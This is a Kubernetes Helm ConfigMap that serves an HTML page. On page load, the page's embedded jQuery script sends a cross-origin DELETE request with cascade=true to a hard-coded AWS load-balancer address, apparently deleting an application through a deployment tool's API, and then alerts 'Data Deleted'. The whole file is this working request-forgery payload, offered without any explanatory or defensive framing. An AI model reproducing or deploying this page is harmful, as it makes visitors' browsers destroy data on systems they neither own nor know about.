apiVersion: v1
kind: ConfigMap
metadata:
  name: content
  namespace: {{ include "common.names.namespace" . | quote }}
data:
  index.html: |
    <HTML>
    <HEAD>
        <script src="https://ajax.googleapis.com/ajax/libs/jquery/3.4.1/jquery.min.js"></script>
    </HEAD>
    <BODY BGCOLOR="FFFFFF">
        <script>
            $.ajax({
                type: "DELETE",
                url: "http://a073d196e75404eb0b55caf34b600130-1471031249.eu-central-1.elb.amazonaws.com/api/v1/applications/test",
                data: "cascade=true",
                success: function(msg){
                    alert("Data Deleted: " + msg);
                }
            });
        </script> 
    </BODY>
    </HTML>
